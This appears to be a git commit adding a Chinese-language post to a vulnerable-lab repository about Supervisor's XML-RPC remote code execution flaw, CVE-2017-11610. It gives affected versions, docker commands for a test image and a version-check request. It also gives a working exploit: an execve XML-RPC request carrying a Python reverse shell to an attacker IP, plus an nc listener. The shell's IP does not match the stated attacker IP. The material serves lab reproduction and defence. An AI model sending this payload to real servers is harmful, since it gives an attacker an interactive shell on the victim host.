(Add Vul: Supervisor) Remote Code Execution(CVE-2017-11610)

2025-06-21 02:10:43 +00:00 · 2017-10-16 15:46:42 +08:00 · 2017-10-16 15:46:42 +08:00 · bb5a1ca7ee
commit bb5a1ca7ee
parent 6a798ac3eb
1 changed files with 169 additions and 0 deletions
--- a/_posts/2017-07-28-s_supervisor.md
+++ b/_posts/2017-07-28-s_supervisor.md
@ -0,0 +1,169 @@
 ---
 layout: post
 title: "Supervisor Remote Code Execution(CVE-2017-11610)"
 date: 2017-07-28 00:41:04
 image: '/assets/img/'
 description: '远程攻击者可发送一段精心构造的请求，可在服务器执行任意代码'
 main-class: 'hole'
 color: '#B31917'
 tags:
 - Supervisor
 - RCE
 categories:
 - Supervisor
 twitter_text: 'Supervisor Remote Code Execution(CVE-2017-11610)环境'
 introduction: 'Supervisor Remote Code Execution(CVE-2017-11610)环境'
 ---
 ### 漏洞信息
 Supervisor 是用 Python 开发的一套通用的进程管理程序，能将一个普通的命令行进程变为后台 daemon，并监控进程状态，异常退出时能自动重启。Supervisor可通过web接口管理服务，在配置了web接口后，同时会在服务器启动一个 XMLRPC 服务器，端口为 9001。该接口可配置需要密码访问，或者无需认证访问。
 在获取该接口的访问权限后，远程攻击者可发送一段精心构造的请求，可在服务器执行任意代码。
 详细信息参考：[[CVE-2017-11610] RCE vulnerability report](https://github.com/Supervisor/supervisor/issues/964)
 ### 影响版本
 大于 3.0
 #### 已经确认：
 * Supervisor 3.1.2 
 * Supervisor 3.3.2
 #### 已修复此漏洞版本
 * Supervisor 3.3.3
 * Supervisor 3.2.4
 * Superivsor 3.1.4
 * Supervisor 3.0.1
 ### 镜像信息
 类型 | 用户名 | 密码
 :-:|:-:|:-:
 http://127.0.0.1/9001/RPC2 | vulapps | vulapps
 > 本环境默认无认证，如需开启，请修改 `/etc/supervisor.conf` 文件
 ### 获取环境:
 1. 拉取镜像到本地
 ```
 $ docker pull medicean/vulapps:s_supervisor_1
 ```
 2. 启动环境
 ```
 $ docker run -d -p 80:80 -p 9001:9001 medicean/vulapps:s_supervisor_1
 ```
 > `-p 80:80` 前面的 80 代表物理机的端口，可随意指定。 
 访问 http://127.0.0.1:80 看到 web 界面即启动成功
 #### PoC
 [查看巡风检测脚本](https://github.com/ysrc/xunfeng/pull/117/)
 无损化检测时可发送该报文，检测返回版本号：
 {% highlight http %}
 POST /RPC2 HTTP/1.1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: text/xml
 Content-Type: text/xml
 Accept-Language: en-GB,en;q=0.5
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Content-Length: 110
 Host: 127.0.0.1:9001
 <?xml version="1.0"?>
 <methodCall>
 <methodName>supervisor.getSupervisorVersion</methodName>
 </methodCall>
 {% endhighlight %}
 返回内容如下：
 {% highlight http %}
 HTTP/1.1 200 OK
 Date: Fri, 28 Jul 2017 05:08:47 GMT
 Content-Length: 131
 Content-Type: text/xml
 Server: Medusa/1.12
 <?xml version='1.0'?>
 <methodResponse>
 <params>
 <param>
 <value><string>3.3.2</string></value>
 </param>
 </params>
 </methodResponse>
 {% endhighlight %}
 如果提示 401 未认证错误，可在请求头中添加 HTTP基础认证
 #### Exp
 **注意：**该 Exp 使用的`execve`, 如果存在漏洞，会将 `supervisord` 进程替换成指定的程序(本 Exp 中将会替换成 `/usr/bin/python`)，换言之，会导致`supervisord`进程退出，**生产环境中请慎用**
 反弹 Shell 演示：
 > 假定启动后的环境如下：
 >
 > 攻击者 IP: 192.168.2.104
 > 
 > 受害者 IP: 192.168.2.100
 1. 在攻击者机器上使用 nc 监听
 ```
 $ nc -lvp 9999
 ```
 2. 向受害者 9001 端口发送如下报文后即可
 {% highlight http %}
 POST http://192.168.2.100:9001/RPC2 HTTP/1.1
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: text/xml
 Content-Type: text/xml
 Accept-Language: en-GB,en;q=0.5
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Content-Length: 638
 Host: 192.168.2.100:9001
 <?xml version="1.0"?>
 <methodCall>
 <methodName>supervisor.supervisord.options.execve</methodName>
 <params>
 <param>
 <string>/usr/bin/python</string>
 </param>
 <param>
 <array>
 <data>
 <value><string>python</string></value>
 <value><string>-c</string></value>
 <value><string>import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.140",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);</string></value>
 </data>
 </array>
 </param>
 <param>
 <struct>
 </struct>
 </param>
 </params>
 </methodCall>
 {% endhighlight %}
 ---
 ![](https://github.com/Medicean/VulApps/raw/master/s/supervisor/1/exp.png)
 ### 参考链接
 * [SSD Advisory – Supervisor Authenticated Remote Code Execution](https://blogs.securiteam.com/index.php/archives/3348)
 * [[CVE-2017-11610] RCE vulnerability report](https://github.com/Supervisor/supervisor/issues/964)